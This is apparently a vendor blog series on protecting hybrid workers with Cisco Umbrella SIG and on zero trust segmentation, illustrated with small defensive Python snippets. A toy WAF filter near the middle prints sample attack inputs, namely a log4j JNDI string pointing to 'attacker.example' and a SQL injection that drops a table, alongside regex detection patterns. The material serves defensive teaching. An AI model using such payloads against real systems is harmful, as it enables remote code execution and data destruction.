Umbrella SIG – Your Field Guide to Protecting the Remote User

The Problem

Here’s the situation – you have a group of users who work a hybrid schedule.  One of the users, while working at home, picks up malware from a compromised website.  That malware-infected PC gets taken back to the office and put on the corporate network, whereupon the malware can then try to spread to other devices.  How do we protect against this kind of situation?

Historically, tools to manage remote device security on the endpoint itself were limited in their security capabilities or had undesirable effects on user experience.  Alternatively, remote users would be required to VPN into the corporate office at boot, with all traffic sent over the VPN for processing by the on-premises security stack.  The first issue with this approach is that a large number of remote users puts considerable load on the corporate firewall and Internet connections, perhaps enough to demand a larger firewall and faster circuits.  The second is what happens when the endpoint is off the VPN – malware or user misbehavior is still possible in that case.  Setting up endpoints for always-on VPN (where the tunnel establishes itself pre-logon, usually with certificate-based authentication) is a possibility, but always-on VPN is notoriously complex and finicky to deploy, making it a poor solution for most organizations.

Advanced Threats

Another demand on security is the need for SSL decryption to detect threats.  Modern malware increasingly uses SSL/TLS encryption, and as such is much harder to detect without decrypting and inspecting that traffic.  SSL decryption on an on-premises firewall has a substantial performance impact, often cutting firewall throughput in half or more – this makes it impractical for the traditional full-tunnel VPN option.

A New Defense

These days, we have better tools.  A whole class of services known as SASE (secure access service edge) has arisen in response to the need to secure a distributed workforce.  However, SASE services differ quite a bit in how they’re implemented.  Most require some form of always-on VPN connection to the SASE service – with all the complexity that entails – to avoid the problem of what happens when the user isn’t connected to the service.

Our preferred SASE solution for remote workers is Umbrella SIG, as it addresses all the common problems we’ve discussed above.  SIG works a bit differently from other solutions, as it doesn’t rely on VPN connectivity.  Instead, traffic destined for the Internet is proxied through the Umbrella cloud, where SSL decryption occurs, followed by inspection and filtering for malware and content restrictions.

Agile and Effective: Umbrella SIG

So, what can SIG do from a security perspective? Here are the key capabilities:

  • File download scanning – files that match known malware signatures are blocked.
  • File type control – disallow users from downloading risky file types. For example, no normal user needs to download a .dll file to their laptop.
  • Detailed content filtering – block not just domains, but specific URLs within a domain. This is especially important with large, sprawling sites like Reddit that contain both legitimate and risky content.
  • Data Loss Prevention (DLP) – scan Internet-bound traffic for well-known or user-defined data patterns that match controlled data such as credit card numbers or intellectual property (see the sketch after this list).
  • SaaS Tenant Controls – keep users contained to the organization’s tenant for services like Microsoft 365.
  • CASB – Discover ‘shadow IT’ SaaS application usage and block access to those apps as needed.
  • Logging and Reporting – Get a clear picture of remote users’ Internet activities and what security events each user has caused.
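To make the DLP item above concrete, here is a minimal sketch of how pattern-based detection of credit card numbers typically works: a regex finds candidate digit runs and a Luhn checksum weeds out random numbers. This is purely illustrative – it is not Umbrella’s detection engine, and the function names and sample text are our own.

```python
import re

# Candidate card numbers: 13-16 digits, optionally separated by spaces or dashes.
CARD_CANDIDATE = re.compile(r"\b(?:\d[ -]?){13,16}\b")

def luhn_ok(number: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    total = 0
    for i, digit in enumerate(int(d) for d in reversed(number)):
        if i % 2 == 1:          # double every second digit from the right
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0

def find_possible_cards(text: str) -> list:
    """Flag digit runs that look like card numbers and pass the Luhn check."""
    hits = []
    for match in CARD_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", match.group())
        if luhn_ok(digits):
            hits.append(digits)
    return hits

if __name__ == "__main__":
    sample = "Order notes: card 4111 1111 1111 1111, ref 1234567890123"
    print(find_possible_cards(sample))   # ['4111111111111111'] -- the ref number fails Luhn
```

A real DLP engine layers context on top of this (file types, destinations, volume thresholds), but the pattern matching itself is conceptually this simple.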

SIG Simplifies Deploying SSL Decryption

Deploying SIG is much easier than most other SASE services due to how it operates. As mentioned before, there is no need for always-on VPN or other invasive endpoint configurations that can break easily. Core features can also be implemented quickly – where complexity exists, it’s inherent to the features themselves rather than to setting up prerequisites. For example, SSL decryption will always need a certificate installed on the endpoint to avoid breaking users’ browsing, and choosing what to decrypt (or not) often needs input from other parts of the organization to ensure users’ private information isn’t compromised (think banking or medical information here – the kind of data that can create liability for the organization if inspected).

Your Umbrella SIG Deployment Guide

Here’s a guide to getting SIG up and running – this assumes you currently have a fully functional Umbrella DNS deployment and want to expand it to SIG. We don’t go into the more complex features here, so consider this a starting point, not an authoritative guide.


Enable the Secure Web Gateway (SWG) capability for your remote endpoints. Note that this requires the new Cisco Secure Client (aka AnyConnect 5.0 or later) to work. SWG can be enabled globally or on a per-identity basis.

Install the Umbrella root certificate on the PCs/Macs you want to protect. Alternatively, if you already have a local CA, a certificate from that CA can be used in place of the Umbrella cert. Without this step, enabling SSL decryption will completely break web browsing for the unfortunate users.
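Once the certificate is in place, a quick way to confirm that decryption is actually happening for a given site is to look at who issued the certificate the endpoint is handed: with decryption on, the issuer will be the Umbrella (or your internal) CA rather than a public CA. The snippet below is a generic sketch using only the Python standard library – nothing Umbrella-specific – that prints the issuer of the certificate presented for a hostname you pick.

```python
import socket
import ssl

def presented_issuer(hostname: str, port: int = 443) -> str:
    """Connect to the host and return the issuer of the certificate we were handed.

    With SSL decryption active, the issuer will be the proxy's CA (e.g. the
    Umbrella root or your internal CA) instead of a public CA like DigiCert.
    A certificate verification error here usually means decryption is on but
    the root certificate isn't in this machine's (or Python's) trust store.
    """
    ctx = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
            cert = tls.getpeercert()
    issuer = dict(item[0] for item in cert["issuer"])
    return issuer.get("organizationName", str(issuer))

if __name__ == "__main__":
    # Pick a site you expect to be decrypted (i.e. not on the bypass list).
    print(presented_issuer("example.com"))
```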

Next, define a list of categories, applications, and URLs that will bypass SSL decryption. Some sites need to be bypassed for functionality reasons (e.g., Windows Update), while others need to be bypassed for non-technical reasons (banking, health, or other sites that can leak protected information).

Now it’s time to set up a SWG policy. First, we create a destination list (or several, as needs dictate). Destination lists are how content filtering policies are applied. If you have a pre-built list of domains and URLs to filter, it can be imported into a destination list via a .csv file.
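Umbrella shows the exact import template in the dashboard, so check that before uploading; as a rough illustration only, the sketch below writes one destination per row to a .csv from a Python list. The filename and entries are made up.

```python
import csv

# Hypothetical destinations to filter -- replace with your own list.
destinations = [
    "gambling-example.com",
    "filesharing-example.net",
    "news-example.org/risky-section/",
]

# One destination per row; confirm the column layout against the import
# template in the Umbrella dashboard before uploading.
with open("destination-list.csv", "w", newline="") as f:
    writer = csv.writer(f)
    for dest in destinations:
        writer.writerow([dest])

print(f"Wrote {len(destinations)} entries to destination-list.csv")
```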

Next, we configure the Web policy.

First, configure the global settings for the ruleset. This is where SSL decryption, file controls, logging, and general security settings are configured. Let’s start with SSL Decryption.

Enable the feature and associate a selective decryption list with it. Next, configure the other global settings as appropriate.

Following this, configure a ruleset for content filtering using the destination lists we created earlier. The individual rules follow the same mode of operation as an ACL – once a match occurs, traffic is either blocked or forwarded, so be careful of rule order to avoid shadowing. Be sure to add identities to each rule and ruleset for them to be applied!
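The first-match behavior is the part that trips people up, so here’s a tiny, generic sketch (nothing Umbrella-specific – rule names and URLs are invented) showing how a broad allow rule placed above a narrower block rule “shadows” it, so the narrow rule never fires.

```python
# Each rule is (name, predicate, action). Evaluation stops at the first match,
# just like an ACL, so ordering decides which rules ever get a chance to fire.
rules = [
    ("allow-reddit", lambda url: "reddit.com" in url,                 "allow"),
    ("block-risky",  lambda url: "reddit.com/r/risky-example" in url, "block"),  # shadowed!
    ("default",      lambda url: True,                                "block"),
]

def evaluate(url: str) -> str:
    """Return the action of the first rule that matches the URL."""
    for name, matches, action in rules:
        if matches(url):
            print(f"{url} -> {action} (rule: {name})")
            return action
    return "block"

evaluate("https://www.reddit.com/r/risky-example/")  # allowed -- the broad rule above wins
evaluate("https://www.reddit.com/r/networking/")     # allowed, as intended
```

Swapping the first two rules (most specific first) fixes the shadowing.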

Finally….

Test SWG settings before rolling them out to the entire organization. Note that once SWG is enabled globally, any endpoint with Secure Client and the Umbrella agent component will forward all web traffic to the Umbrella cloud to be proxied. No policy is applied unless identities are added to rulesets, so impact will be minimal until appropriate rulesets and identities are configured.
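One quick sanity check during the pilot is to confirm that a test endpoint’s web traffic is actually egressing through the Umbrella cloud rather than straight out the local Internet connection. The sketch below asks a public IP-echo service (api.ipify.org) what address the world sees; compare the result against the Umbrella egress ranges Cisco publishes, which we leave as an empty placeholder list here.

```python
import ipaddress
import urllib.request

# Placeholder -- fill in from Cisco's published Umbrella egress ranges.
UMBRELLA_EGRESS_RANGES = [
    # ipaddress.ip_network("x.x.x.x/24"),
]

def current_egress_ip() -> str:
    """Ask a public IP-echo service what address our web traffic appears from."""
    # Note: if decryption is on and Python doesn't trust the Umbrella root,
    # this HTTPS call may fail with a certificate error.
    with urllib.request.urlopen("https://api.ipify.org", timeout=10) as resp:
        return resp.read().decode().strip()

if __name__ == "__main__":
    ip = ipaddress.ip_address(current_egress_ip())
    proxied = any(ip in net for net in UMBRELLA_EGRESS_RANGES)
    print(f"Egress IP: {ip} -> {'in an Umbrella range' if proxied else 'no match (check the range list)'}")
```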

What is a Zero Trust Philosophy?

Zero Trust: It’s a philosophy, not a plan

The Mindset

One of the current trends in IT security that gets a lot of press and discussion is the idea of zero trust.  Zero trust, however, is really a philosophy, not a plan of action.  Specifically, it is the philosophy that all IT resources, whether internal or external, should be treated as untrusted or even potentially compromised.  While the philosophy is simple, applying it to a live environment can be anything but!  Executing on it requires a holistic approach to security and good cooperation between all stakeholders in the organization.  It extends beyond the technology infrastructure to the employees and even to organizational policies themselves.

It’s important to keep in mind that the threat landscape is always changing – what may have been good practice five years ago may not be so today. This is what drove us at Crossconnect to develop a series of posts laying out how to adopt a zero trust philosophy in your organization.

Getting Started

This series will explore various aspects of technology infrastructure with an eye towards how things are built with a zero trust mindset.  Before we get into those details, it’s always best to take some time to think about the big-picture questions – many of the areas of security that we’ll talk about have options that range from ‘very simple’ to ‘year-long project.’ Figuring out where effort needs to be spent will go a long way towards creating an effective security infrastructure for your organization.

Foundations of Zero Trust Philosophy

The first step in planning is to think about the capabilities of your organization and the threats you’re likely to face.  Many threats are industry or organization specific, but some are universal.  First, of course, is ransomware – probably the biggest general threat most organizations will face.  Fraud and theft also rank high in terms of general threats.  Sometimes the organization’s data itself is the target – there are plenty of groups out there who want confidential information for any number of reasons, even just to leak it to the public.  And finally, bad actors may compromise your organization simply to gain access to a 3rd party’s network via yours – think contractors and other service providers.

Next, look at your internal capabilities.  Security is, unfortunately, time-consuming to manage.  As such, it gets hard to manage some solutions with limited staff and budget.  Consider what your organization is capable of managing and monitoring when looking at security products and services – a simple but well-managed system is going to be more effective than a very capable, yet complex and maintenance-intensive system that gets neglected.

Once you have a good understanding of your threats and capabilities, it’s time to build a plan.  The core of a security plan is to look at the applications in use, the files and information that need to be accessed, and the infrastructure they run on, then figure out who and what needs access to each.  The goal is to limit access for any device, user, or application to only the resources it needs.

Zero Trust Philosophy Index

This series will explore the areas of security that need to be addressed in order to make your plan a reality and to discuss specific areas of focus on how to apply a zero trust mindset.  

  • Datacenter
  • Route/switch
    • Features that ensure integrity of network operations
  • Wireless
    • Capabilities for detection and mitigation of RF based attacks
  • Endpoint
    • Network Access Control (NAC) – Ensuring that endpoint activity is controlled and that security threats are detected and mitigated before an exploit can occur
  • Network Security
    • Ensuring that all traffic through the network is controlled and monitored for malicious activity
  • Cloud Security
    • Ensuring that user to cloud access is controlled and that cloud resources are appropriately provisioned and accounted for.
  • The Human Factor
    • Ensuring that end users are aware of security issues and responsible for their security choices.

User to Machine Security

Zero Trust in the Datacenter – Protecting Your Servers from Your Users

For the first part of our explorations of the zero trust philosophy, we’re going to look at the datacenter. 


It’s All in the Flow

When we look at the datacenter, we have two types of traffic flows, each of which needs to be looked at from a security perspective.  First is user to machine security.  Protecting one’s datacenter resources from the users has always been a necessity; however, the types of threats and what we consider a user have changed a lot over the years.  Second is machine to machine security.  This area of datacenter security is much newer and has historically been challenging and expensive to implement.  We’ll be focusing on user to machine security for now – machine to machine security will be discussed in a future post.

Note: What we discuss here can easily be applied to servers located on-prem, co-located, or even in the public cloud. 

On to User to Machine Security

The primary type of user to machine security is what’s commonly referred to as north-south security, where the focus is on Internet users.  Exposing necessary resources to the Internet is a requirement for obvious reasons, but Internet-based threats are omnipresent and can be of considerable sophistication.  It may seem obvious, but it bears repeating that any security policy should be built with only the necessary access privileges granted.  For Internet-facing users, this is usually easy – modern websites/applications usually just require that HTTP/HTTPS traffic coming in on ports 80 and 443 is allowed.  Legacy applications can complicate this process, though, so always work with the application team to understand all requirements for the application to function and build access policies appropriate to your environment.

Beyond simple access controls, it’s important to also consider what the users are inputting into the application. 

For example, putting malicious input in an HTTP POST request is a very common way of trying to get the application to give up information, grant inappropriate access, or otherwise misbehave in a way beneficial to the attacker.  How to abuse application inputs is firmly out of scope for this post – whole books have been written on how to exploit things at the application level.  Addressing this kind of abuse is also more complicated.  Port and protocol filtering is really a go/no-go type of rule, while inspecting inputs is much harder due to the far more open-ended nature of user input.  There are application best practices for sanitizing user inputs, but especially with proprietary applications, it’s not always possible to do so.  It’s also better to be able to stop malicious traffic before it ever touches the application.  For this, we most commonly use a web application firewall (WAF).

What is a WAF?

With a WAF, we can look directly at the payload of interesting packets and filter based on their contents.  For example, a field on a website that’s meant for name input shouldn’t ever have SQL syntax appearing in it.  On the WAF, a rule is created (using lots of regexes!) to identify anything like this and block it.  WAFs and similar application-specific security tools are, unfortunately, a Very Hard Thing to implement.  The nature of a WAF means that HTTPS traffic needs to be decrypted, which presents challenges in not breaking TLS.  Once that’s been dealt with, building appropriate rules needs close collaboration between the security and application teams to ensure that the WAF is blocking everything it should be, and that rules are updated as applications are updated or as threats emerge.  The infamous log4j vulnerability is one that a good WAF rule can easily block, but building that rule requires a solid understanding of how the vulnerability is exploited and how the exploit strings are constructed.  To see what a sample WAF rule blocking log4j exploit attempts looks like, F5 has a ready-to-go iRule available here.
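To make the regex idea concrete, here’s a deliberately simplified sketch of the kind of matching a WAF rule performs – one toy pattern flags obvious SQL syntax in a field that should only ever contain a name, and another flags the well-known ${jndi:...} lookup strings used in basic log4j exploit attempts. Real rules (including the F5 iRule linked above) are far more thorough, since attackers obfuscate these strings heavily; treat this as an illustration, not a drop-in rule.

```python
import re

# A "name" field has no business containing SQL syntax...
SQL_IN_NAME = re.compile(r"('|--|;|\b(select|union|insert|drop)\b)", re.IGNORECASE)

# ...and no request parameter should contain a JNDI lookup string
# (the basic, unobfuscated form of a log4j exploit attempt).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns)\s*:", re.IGNORECASE)

def inspect_post_field(field: str, value: str) -> str:
    """Return 'block' if the value trips one of our toy patterns, else 'allow'."""
    if field == "name" and SQL_IN_NAME.search(value):
        return "block"
    if JNDI_LOOKUP.search(value):
        return "block"
    return "allow"

print(inspect_post_field("name", "Robert'); DROP TABLE students;--"))      # block
print(inspect_post_field("name", "Jane O'Connor"))                         # block -- a false positive; tuning matters
print(inspect_post_field("comment", "${jndi:ldap://attacker.example/a}"))  # block
print(inspect_post_field("comment", "Great product, thanks!"))             # allow
```

The false positive on a perfectly legitimate name is exactly why WAF rule-building needs that close collaboration between the security and application teams.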

Other User to Machine Security Considerations

The next part of user to machine security is a somewhat newer topic – protecting your datacenter resources from your own users.  This is also referred to as internal segmentation.  Historically, trying to firewall your users off from your datacenter was difficult, expensive, and of limited value.  Times have changed, and we’re at a point where your users can be as dangerous to the business as an Internet-based threat.  Studies of where attacks gain their initial foothold show that 90% or more of attacks begin with a user opening a malicious email or running a bad executable.  Once run, the malware will crawl the network looking for vulnerabilities, gain a foothold in the datacenter, and then go to work exfiltrating or encrypting data or otherwise disrupting business operations.  With a traditional setup where internal users are considered trustworthy, their traffic is considered good by default and doesn’t warrant being firewalled.  That’s not a good stance to take given the statistic above.

Callout: Internal segmentation of some variety should be considered a need to have in a modern security-first network design. 

Implementing Internal Segmentation

This is one of those tasks whose complexity is hard to pin down.  On the simple end of the spectrum, putting some basic security ACLs in place at the border device between the DC and the users is surprisingly effective for the amount of effort it takes.  Most organizations should be looking at a firewall for this purpose, though.  Modern firewalls have many more options for inspecting traffic, detecting threats, and alerting IT staff when something is detected.  Some features are actually easier to implement on an internal segmentation firewall, too, and SSL inspection is one of the best examples.  Cracking open TLS traffic is a notoriously resource-intensive task and, if done for Internet-bound traffic, can easily overwhelm a firewall, break websites, or potentially cause HR issues when certain types of user communications are inspected (banking and health information are two major no-nos for deep packet inspection).  SSL inspection between users and the datacenter has none of these concerns.  Traffic volumes between users and the DC are usually well known and don’t change much, so firewalls can be sized to avoid performance issues.

As for concerns about user privacy, interaction with internal resources and data is pretty much open season for whatever security you want to implement – there’s nothing in, say, an employee’s interactions with the organization’s ERP system that would be out of bounds to inspect, log, and audit.

Some Final Considerations

One final thing to consider is how to treat access for 3rd party contractors and how to properly categorize their traffic.  The prevailing wisdom these days is to treat 3rd party contractors as equivalent to Internet-facing users, as several high-profile intrusions were launched via a 3rd party with direct access to sensitive resources.  It’s a little more involved, though – simply allowing ports 80 and 443 through to a list of servers isn’t enough.  3rd party contractors may need specialized access or a large number of permit rules compared to either an employee or an Internet user, so close coordination with your 3rd party is required to keep access requirements to a minimum.  Due to the complexity of building network-based security policies suitable for contractors, another option we’re seeing adopted more lately is deploying jump servers with enhanced access management software, such as what Bomgar or SecureLink provide.  This type of software gives IT staff additional capabilities, such as full session monitoring, access notification, and the ability to allow logins only at specific times or only when explicitly approved.  With this level of control on the jump server, it becomes easier to build other security policies in a much more general way.  Since all contractors access resources via a jump server, access control rules only have to permit a small number of hosts from known subnets, and detailed application-based or port/protocol-based rules can often be omitted or reduced in complexity.
